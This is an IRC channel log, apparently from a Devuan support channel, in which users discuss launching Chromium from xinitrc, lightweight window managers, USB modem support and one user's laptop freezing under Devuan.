iovecpremoboss: possible, just execute int chromium in your xinitrc script18:22
premobossgonna try, thanks.18:22
ioveckeep in mind you would have no window management available, and no auxillary daemons for session management, so either use a DE/WM, or for them in the background before executing into it.18:22
iovecfork*18:23
jonadabpremoboss: There has to _be_ a window manager.  LXDE isn't the only option, there may be something lighter weight, but there has to be one.18:31
jonadabDunno of twm is still actively maintained.  fvwm probably.  Not sure how these compare to lxde.18:31
jonadabOh, actually, look at tiling window managers though.18:31
jonadabThere are several of those, they tend to be pretty lightweight.18:31
jonadabratpoison was the first, I think, but it may not be current now.18:32
telst4rdwm.18:32
premobossi user twm in past, i will give a look even if it was very "perimitive" but also very light18:32
telst4ror something that sucks less.18:32
jonadabIf you can get chromium to only ever use one window ever, no dialog boxes or anything, then the window manager could potentially be _extremely_ lightweight.18:33
jonadabBut I don't know if chromium can be quite that window-sparse.  Most applications cannot.18:34
koollmanthere doesn't have to be one, but it's very, very limited without one :)18:35
foresterHi. Have a Devuan 2 live CD a modemmanager?19:35
foresterto use usb modem for internet access19:36
filipdevuan_so funny https://systemd-free.artixlinux.org/img/systemd-devours-all.gif20:33
furrywolflol20:36
newsanchorDevuan sucks. It destroyed my computer. Any thoughts?20:36
ioveci sympathize with you20:37
filipdevuan_how did devuan destroy your computer??20:39
newsanchorit freezes if it has to perform more than 3 tasks. And I know it is unpopular to say but it worked with windows20:41
newsanchordoes anyone have a solution for Linux ASUS T100A compatibility?20:42
filipdevuan_what tasks are these any tasks?? or any specific software?? :D20:42
newsanchorreceiving e-mail in thunderbird and browsing at the same time is too much for HIM now...:(20:45
newsanchorSo, downloading data...20:46
Anselmois this unique to devuan or is it just a linux thing,20:46
filipdevuan_thats really weird and i dont know why maybe u should use different email client for example claws mail20:47
newsanchorI tried. Beacause I really wanted linux to work, but it didn't help20:48
Anselmothe issue is, lack of memory ?20:49
Anselmoare you just, running outof memory and swapping ?20:50
newsanchorDevuan also didn't work on HP EliteBook 2760p/162A. But the HP works with Ubuntu. Do not know why...20:51
newsanchorI don't think that I lack on memory20:52
newsanchorAnd the HP didn't even want to start. MAybe I am just Devuan unlucky20:52
Anselmohrm20:53
filipdevuan_so i believe its not devuan that sucks but your laptop22:04
filipdevuan_hey if synaptic package manager has outdated version of some app how can i download the newer one using termninal??23:51

Generated by irclog2html.py 2.17.0 by Marius Gedminas - find it at https://mg.pov.lt/irclog2html/!